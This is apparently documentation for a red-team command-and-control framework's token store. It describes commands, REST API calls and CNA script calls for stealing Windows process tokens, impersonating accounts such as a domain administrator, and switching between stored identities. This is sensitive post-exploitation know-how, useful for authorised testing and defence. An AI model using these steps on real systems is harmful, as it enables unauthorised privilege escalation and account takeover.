Token Store¶

The token store provides persistent token management across impersonation switches. Tokens stolen from processes or created with credentials are stored as independent duplicates that survive rev2self. Operators can list, switch between, and remove stored tokens without re-stealing them.

This matches Cobalt Strike v4.12 token-store behavior.

Token Store Commands¶

Basic Token Commands¶

Token Store Workflow¶

sequenceDiagram
    participant Op as Operator
    participant BC as Beacon
    participant TM as Token Manager

    Op->>BC: token_store_steal 1234
    BC->>TM: OpenProcess(1234) → DuplicateToken
    TM->>TM: Store token (ID=1)
    TM->>TM: Impersonate DOMAIN\DomainAdmin
    BC-->>Op: [+] Impersonating DOMAIN\DomainAdmin (stored ID=1)

    Op->>BC: token_store_steal 5678
    TM->>TM: Store token (ID=2)
    TM->>TM: Impersonate DOMAIN\svc_sql
    BC-->>Op: [+] Impersonating DOMAIN\svc_sql (stored ID=2)

    Op->>BC: token_store_use 1
    TM->>TM: Switch to stored ID=1
    BC-->>Op: [+] Switched to DOMAIN\DomainAdmin

    Op->>BC: rev2self
    TM->>TM: Revert (tokens still in store)
    BC-->>Op: [*] Reverted to original identity

    Op->>BC: token_store_use 2
    TM->>TM: Re-impersonate ID=2
    BC-->>Op: [+] Switched to DOMAIN\svc_sql

Commands Reference¶

token_store_steal <pid>¶

Atomically steal a token from a process, impersonate it, and store it in the token store. This is a single round-trip operation (not two separate tasks).

Shell syntax:

token_store_steal 1234

API example:

# Via REST endpoint
curl -s -X POST "https://stentor.app/api/v1/c2/beacons/$BEACON_ID/token/steal" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"pid": 1234}'

CNA scripting:

btoken_store_steal($bid, 1234);

token_store_show¶

List all tokens currently in the store with their metadata.

Shell syntax:

token_store_show

API example:

curl -s "https://stentor.app/api/v1/c2/beacons/$BEACON_ID/token/list" \
  -H "Authorization: Bearer $TOKEN"

Example output:

Token Store (3 entries):

  ID  Type     PID   Username              SID
  --  ----     ---   --------              ---
  1   stolen   1234  CORP\DomainAdmin      S-1-5-21-...-512
  2   stolen   5678  CORP\svc_sql          S-1-5-21-...-1105
  3   created  --    CORP\jsmith (network) S-1-5-21-...-1103

CNA scripting:

btoken_store_show($bid);

token_store_use <id>¶

Switch to a previously stored token by its store ID.

Shell syntax:

token_store_use 1

API example:

curl -s -X POST "https://stentor.app/api/v1/c2/beacons/$BEACON_ID/token/use" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"store_id": 1}'

CNA scripting:

btoken_store_use($bid, 1);

token_store_remove <id>¶

Remove a specific token from the store and close its handle.

Shell syntax:

token_store_remove 2

CNA scripting:

btoken_store_remove($bid, 2);

token_store_remove_all¶

Clear the entire token store, closing all stored handles.

Shell syntax:

token_store_remove_all

CNA scripting:

btoken_store_remove_all($bid);

Identity Model¶

The token manager distinguishes between two types of impersonation:

• steal_token duplicates an existing process token. Both local and network identity change to the token owner
• make_token creates a logon token with LogonUser(LOGON32_LOGON_NEW_CREDENTIALS). The beacon's local identity stays the same, but network operations authenticate as the specified user

Automatic Token Storage¶

As of v20.0, steal_token and make_token automatically store tokens in the token vault alongside the explicit token_store_* commands. Every token operation records metadata for operational tracking:

Auto-store failures are non-fatal -- the operation succeeds and returns storeID=0 if storage fails. The active store ID is tracked cross-platform (defined in tokenmanager.go).

REST API Endpoints¶